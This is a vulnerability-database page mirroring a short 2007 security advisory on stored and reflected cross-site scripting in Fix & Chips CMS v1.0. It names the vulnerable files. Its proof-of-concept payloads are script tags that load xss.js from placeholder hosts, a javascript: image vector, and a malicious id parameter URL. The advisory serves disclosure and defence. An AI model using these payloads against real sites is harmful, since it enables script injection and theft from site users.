Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormLunyPACKETSTORM:53516
HistoryJan 13, 2007 - 12:00 a.m.

fcCMS10-xss.txt

2007-01-1300:00:00
Luny
packetstormsecurity.com
11
JSON
`Fix & Chips CMS v1.0  
  
http://software.fixnchipsit.com/  
  
Vulnerable files:  
  
staff.php  
delete-announce.php  
new-customer.php  
search.php  
client-results.php  
--------------------------------------------  
  
staff.php XSS  
User input in the Announcement box isn't properly sanatized before being generated.  
  
A few PoC's that work:  
  
<SCRIPT SRC=http://somesite.com/xss.js></SCRIPT>  
  
<IMG SRC=javascript:alert("XSS")>  
  
----------------------------------------------  
  
delete-announce.php XSS  
  
http://www.example.com/delete-announce.php?id=<SCRIPT%20SRC=example.com/xss.js></SCRIPT>  
  
-------------------------------------------------  
new-customer.php  
  
User input in all of the input boxes when adding a new customer isnt sanatized. For a PoC in any input box when adding a new   
  
client put:  
  
<SCRIPT SRC=http://example.com/xss.js></SCRIPT>  
  
Because of the above, all malicious user input that is listed on the pages search.php and client-results.php will execute as well.  
  
------------------------------------------------  
  
- Luny  
`
JSON